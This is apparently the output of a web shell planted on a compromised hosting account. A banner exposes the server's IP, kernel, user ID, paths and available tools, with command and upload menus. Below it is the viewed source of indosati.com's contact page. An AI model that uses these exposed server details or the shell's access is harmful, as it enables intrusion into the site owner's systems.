Server IP : 2a02:4780:11:1361:0:bf7:7935:10 / Your IP : 3.20.224.38 Web Server : LiteSpeed System : Linux in-mum-web1261.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u200767797 ( 200767797) PHP Version : 8.1.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u200767797/domains/entecmedia.com/../indosati.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <!-- meta tags --> <meta charset="utf-8"> <meta name="keywords" content="bootstrap 5, premium, multipurpose, sass, scss, saas, rtl, Laboratory, medical" /> <meta name="description" content="Laboratory & Science Research HTML5 Template" /> <meta name="author" content="www.themeht.com" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Title --> <title>About Us Indosati </title> <!-- favicon icon --> <link rel="shortcut icon" href="images/favicon.ico" /> <!-- inject css start --> <!--== bootstrap --> <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" /> <!--== fonts --> <link href="https://fonts.googleapis.com/css2?family=Livvic:ital,wght@0,300;0,400;0,500;0,600;0,700;0,900;1,300;1,400;1,500;1,600;1,700;1,900&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Barlow+Condensed:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet"> <!--== animate --> <link href="css/animate.css" rel="stylesheet" type="text/css" /> <!--== line-awesome --> <link href="css/line-awesome.min.css" rel="stylesheet" type="text/css" /> <!--== magnific-popup --> <link href="css/magnific-popup.css" rel="stylesheet" type="text/css" /> <!--== owl.carousel --> <link href="css/owl.carousel.css" rel="stylesheet" type="text/css" /> <!--== lightslider --> <link href="css/lightslider.min.css" rel="stylesheet" type="text/css" /> <!--== base --> <link href="css/base.css" rel="stylesheet" type="text/css" /> <!--== shortcodes --> <link href="css/shortcodes.css" rel="stylesheet" type="text/css" /> <!--== spacing --> <link href="css/spacing.css" rel="stylesheet" type="text/css" /> <!--== style --> <link href="css/style.css" rel="stylesheet" type="text/css" /> <!--== color-customizer --> <!-- inject css end --> </head> <body> <!-- page wrapper start --> <div class="page-wrapper"> <!-- preloader start --> <?php include('header.php')?> <section class="page-title parallaxie" data-bg-img="images/bg/06.jpg"> <div class="container"> <div class="row"> <div class="col-lg-6"> <div class="white-bg p-md-5 p-3 d-inline-block"> <h1 class="text-theme">Contact <span class="text-black">Us</span></h1> <nav aria-label="breadcrumb" class="page-breadcrumb border-top border-light pt-3 mt-3"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.html"><i class="las la-home me-1"></i>Home</a> </li> <li class="breadcrumb-item">Pages </li> <li class="breadcrumb-item active" aria-current="page">Contact Us</li> </ol> </nav> </div> </div> </div> </div> </section> <!--page title end--> <!--body content start--> <div class="page-content"> <!--contact start--> <section> <div class="container"> <div class="row"> <div class="col"> <div class="light-bg"> <div class="row text-center"> <div class="col-lg-5 pe-lg-0"> <div class="dark-bg px-3 py-5 p-md-5 custom-mt-0 text-white"> <div class="contact-media mb-4"> <h5 class="text-white">Find Office:</h5> <span>#3674, Timber Market, Ambala Cantt-133001 (HR), India</span> </div> <div class="contact-media mb-4"> <h5 class="text-white">Contact Us:</h5> <ul class="list-unstyled"> <li class="mb-2">Phone: <a href="tel:+912345678900"> +91-92155-50056</a> </li> <li class="mb-2">Phone: <a href="tel:+912345678900">0171-4000131/4001131</a> </li> <li>Email: <a href="#">aayushbansal@indosati.com, info@indosati.com</a> </li> </ul> </div> <div class="contact-media mb-4"> <h5 class="text-white">Working Hours:</h5> <span>Monday - Saturday: 9.30am To 6.30pm</span> </div> <div class="social-icons"> <ul class="list-inline"> <li><a href="#"><i class="lab la-facebook-f"></i></a> </li> <li><a href="#"><i class="lab la-twitter"></i></a> </li> <li><a href="#"><i class="lab la-instagram"></i></a> </li> <li><a href="#"><i class="lab la-dribbble"></i></a> </li> <li><a href="#"><i class="lab la-linkedin-in"></i></a> </li> </ul> </div> </div> </div> <div class="col-lg-7 ps-lg-0"> <div class="section-title mt-6"> <h2 class="title">Drop A Line!</h2> <p class="mb-0">Any Question or Remarks ? Just Write Us a Message!</p> </div> <div class="white-bg px-3 py-5 p-md-6 shadow-sm"> <form method="post" action="formcode.php"> <div class="form-group"> <input type="text" name="name" class="form-control" placeholder="Name" required="required"> </div> <div class="form-group"> <input type="email" name="email" class="form-control" placeholder="Email" required="required"> </div> <div class="form-group"> <input type="text" name="phone" class="form-control" placeholder="Phone" required="required"> </div> <div class="form-group"> <select name="select" class="form-select form-control"> <option>- Choose Category</option> <option value="Anatomy">Anatomy</option> <option value="Biochemistry">Biochemistry </option> <option value="Community medicine">Community medicine </option> <option value="Forensic medicine">Forensic medicine </option> <option value="Microbiology">Microbiology </option> <option value="Pathology">Pathology </option> <option value="Pharmacology">Pharmacology </option> <option value="Physiology">Physiology</option> </select> </div> <div class="form-group"> <textarea name="message" class="form-control" placeholder="Message" rows="3" required="required"></textarea> </div> <div class="mt-4"> <button class="btn btn-theme" name="send"><span>Send Messages</span> </button> </div> </form> </div> </div> </div> </div> </div> </div> </div> </section> <!--contact end--> <!--map start--> <section class="p-0"> <div class="container-fluid p-0"> <div class="row"> <div class="col-md-12"> <div class="map"> <iframe src="https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d13773.672862616533!2d76.8457621!3d30.3390621!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x390fb617ccd1990f%3A0x56c886675561502a!2sThe%20Indo%20Sati%20Instruments%20%26%20Chemicals!5e0!3m2!1sen!2sin!4v1731654974653!5m2!1sen!2sin" width="100%" height="350" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> </div> </div> </div> </section> <!--map end--> </div> <!--team end--> <!--footer start--> <?php include('footer.php');?> <!--footer end--> </div> <!--color-customizer end--> <!--back-to-top start--> <div class="scroll-top"><a class="smoothscroll" href="#top"><i class="las la-location-arrow"></i></a></div> <!--back-to-top end--> <!-- inject js start --> <!--== jquery --> <script src="js/theme.js"></script> <!--== theme-plugin --> <script src="js/theme-plugin.js"></script> <!--== color-customize --> <script src="js/color-customize/color-customizer.js"></script> <!--== theme-script --> <script src="js/theme-script.js"></script> <!-- inject js end --> </body>